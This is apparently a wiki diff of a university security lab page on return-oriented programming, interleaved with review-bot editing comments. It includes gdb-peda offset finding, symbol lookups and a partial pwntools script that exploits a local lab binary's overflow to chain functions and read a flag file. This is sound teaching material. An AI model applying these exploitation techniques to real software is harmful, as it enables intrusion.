This shows you the differences between two versions of the page.

| cns:labs:lab-09 [2020/12/14 14:49] dennis.plosceanu [2. Stack pivoting] | cns:labs:lab-09 [2022/12/05 13:36] (current) mihai.dumitru2201 [Tasks] |
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab 09 - Return Oriented Programming (Part 2) ====== | + | ====== Lab 09 - Return-Oriented Programming (Part 2) ====== |
| - | ===== Resources ===== | ||
| - | |||
| - | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] | ||
| - | |||
| - | ===== Supporting files ===== | ||
| - | |||
| - | You will use this [[http://elf.cs.pub.ro/oss/res/labs/lab-09.tar.gz|lab archive]] throughout the lab. | ||
| - | |||
| - | Please download the lab archive an then unpack it using the commands below: | ||
| - | <code bash> | ||
| - | $ wget http://elf.cs.pub.ro/oss/res/labs/lab-09.tar.gz | ||
| - | $ tar xzf lab-09.tar.gz | ||
| - | </code> | ||
| - | |||
| - | After unpacking, you will get the ''lab-09/'' folder: | ||
| - | <code bash> | ||
| - | $ cd lab-09/ | ||
| - | $ ls -F | ||
| - | flag Makefile task1* task1.c | ||
| - | </code> | ||
| ===== Introduction ===== | ===== Introduction ===== | ||
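Review bot: Deleting the Supporting files section removes the only description of the expected working tree (`flag`, `Makefile`, `task1*`, `task1.c`) without replacing it in this hunk; with the archive and the `wget`/`tar` steps gone, keep one sentence stating where `ret_to_main.c` and `flag` are found so the "Inspect the source file" step below has a concrete path. Moving Resources to the end of the page is fine; the old "an then unpack" typo disappears with the deleted block.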
| Line 49: | Line 29: | ||
| ===== Tasks ===== | ===== Tasks ===== | ||
| + | |||
| + | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
| + | |||
| + | |||
| ==== 1. Return to main ==== | ==== 1. Return to main ==== | ||
| - | Inspect the source file ''task1.c''. See if you can spot the vulnerability. | + | Inspect the source file ''ret_to_main.c''. See if you can spot the vulnerability. |
| The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | ||
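Review bot: The added repository sentence is followed by two empty rows (a double blank line) while the other headings on the page are separated by a single blank line; drop one. The renamed reference `''ret_to_main.c''` would also benefit from naming the repository subdirectory, since the new sentence says only that all content is in the repo.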
| Line 59: | Line 43: | ||
| <code asm> | <code asm> | ||
| - | # gdb ./task1 | + | # gdb ./ret_to_main |
| gdb-peda$ pattc 0x40 | gdb-peda$ pattc 0x40 | ||
| 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | ||
| gdb-peda$ r | gdb-peda$ r | ||
| - | Starting program: /cns/lab-11/sol/task1 | + | Starting program: /cns/lab-11/sol/ret_to_main |
| Welcome to our Retired Old Programmers message board! | Welcome to our Retired Old Programmers message board! | ||
| Please leave a message: | Please leave a message: | ||
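Review bot: The `Starting program:` line still reads `/cns/lab-11/sol/ret_to_main` on a page titled Lab 09; the edit renamed only the binary, so either re-capture the session or change the directory to match this lab, otherwise readers may look for the binary in the wrong place.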
| Line 115: | Line 99: | ||
| </code> | </code> | ||
| - | Our $rbp is at offset 48 => the return address will be at offset 56. | + | Our ''$rbp'' is at offset 48 => the return address will be at offset 56. |
| === Tutorial: Opening the flag file and returning to main === | === Tutorial: Opening the flag file and returning to main === | ||
| Line 127: | Line 111: | ||
| We'll need to save a few useful addresses: | We'll need to save a few useful addresses: | ||
| <code bash> | <code bash> | ||
| - | # nm task1 | egrep "main|stop|right|there|play" | + | # nm ret_to_main | egrep "main|stop|right|there|play" |
| | | ||
| 00000000004012b5 T main | 00000000004012b5 T main | ||
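Review bot: `egrep` is obsolescent in current GNU grep (it prints a warning and calls `grep -E`), so while this line is being touched use `# nm ret_to_main | grep -E "main|stop|right|there|play"`. The empty row between the command and the `main` symbol looks like a stray blank output line and can be dropped.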
| Line 143: | Line 127: | ||
| from pwn import * | from pwn import * | ||
| - | io = process('./task1') | + | io = process('./ret_to_main') |
| # Useful values | # Useful values | ||
| Line 173: | Line 157: | ||
| <code bash> | <code bash> | ||
| # ./test.py | # ./test.py | ||
| - | [+] Starting local process './task1': Done | + | [+] Starting local process './ret_to_main': Done |
| [*] Switching to interactive mode | [*] Switching to interactive mode | ||
| -> secret vault opened | -> secret vault opened | ||
| Line 179: | Line 163: | ||
| Please leave a message: | Please leave a message: | ||
| $ | $ | ||
| - | [*] Stopped program './task1' | + | [*] Stopped program './ret_to_main' |
| </code> | </code> | ||
| Line 338: | Line 322: | ||
| Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | ||
| + | ===== Resources ===== | ||
| + | |||
| + | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] | ||
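Review bot: The moved `===== Resources =====` heading is placed directly after the final task sentence with no blank row before it, unlike the other headings on the page, which are preceded by a blank line; add one so the section renders with the same spacing.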